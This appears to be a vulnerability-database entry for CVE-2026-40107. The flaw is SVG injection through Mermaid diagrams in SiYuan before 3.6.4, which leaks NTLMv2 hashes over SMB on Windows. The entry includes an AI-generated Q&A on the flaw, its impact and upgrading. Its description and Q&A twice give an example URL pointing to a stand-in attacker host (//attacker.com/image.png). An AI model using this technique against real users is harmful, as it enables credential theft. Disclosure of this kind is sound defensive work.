CVE-2026-40107
Received Received - Intake
SMB Relay via SVG Injection in SiYuan Before

Publication date: 2026-04-09

Last updated on: 2026-04-16

Assigner: GitHub, Inc.

Description
SiYuan is a personal knowledge management system. Prior to 3.6.4, SiYuan configures Mermaid.js with securityLevel: "loose" and htmlLabels: true. In this mode, <img> tags with src attributes survive Mermaid's internal DOMPurify and land in SVG <foreignObject> blocks. The SVG is injected via innerHTML with no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the URL. On Windows, a protocol-relative URL (//attacker.com/image.png) resolves as a UNC path (\\attacker.com\image.png). Windows attempts SMB authentication automatically, sending the victim's NTLMv2 hash to the attacker. This vulnerability is fixed in 3.6.4.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-04-09
Last Modified
2026-04-16
Generated
2026-05-07
AI Q&A
2026-04-10
EPSS Evaluated
2026-05-05
NVD
CVE-2026-40107
EUVD
EUVD-2026-21148
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
b3log siyuan to 3.6.4 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-918 The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
Attack-Flow Graph
AI Powered Q&A
What immediate steps should I take to mitigate this vulnerability?

The vulnerability is fixed in SiYuan version 3.6.4. Therefore, the immediate step to mitigate this vulnerability is to upgrade the SiYuan personal knowledge management system to version 3.6.4 or later.


Can you explain this vulnerability to me?

This vulnerability exists in SiYuan, a personal knowledge management system, prior to version 3.6.4. SiYuan configures Mermaid.js with securityLevel set to "loose" and htmlLabels enabled. In this configuration, <img> tags with src attributes are not properly sanitized and end up inside SVG <foreignObject> blocks. The SVG content is then injected into the application using innerHTML without any additional sanitization.

When a user opens a note containing a malicious Mermaid diagram, the Electron client fetches the image URL. On Windows systems, if the URL is protocol-relative (e.g., //attacker.com/image.png), it is interpreted as a UNC path (\\attacker.com\image.png). Windows then attempts to authenticate to this SMB path automatically, sending the victim's NTLMv2 hash to the attacker.

This behavior can lead to credential leakage to an attacker-controlled server. The vulnerability was fixed in SiYuan version 3.6.4.


How can this vulnerability impact me? :

This vulnerability can lead to the leakage of NTLMv2 hashes from a victim's Windows machine to an attacker. Specifically, when a user opens a malicious note containing a crafted Mermaid diagram, their system may automatically send authentication hashes to an attacker-controlled SMB server.

An attacker who obtains these hashes could attempt to use them to authenticate or perform further attacks on the victim's network or systems, potentially leading to unauthorized access or lateral movement within an organization.


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart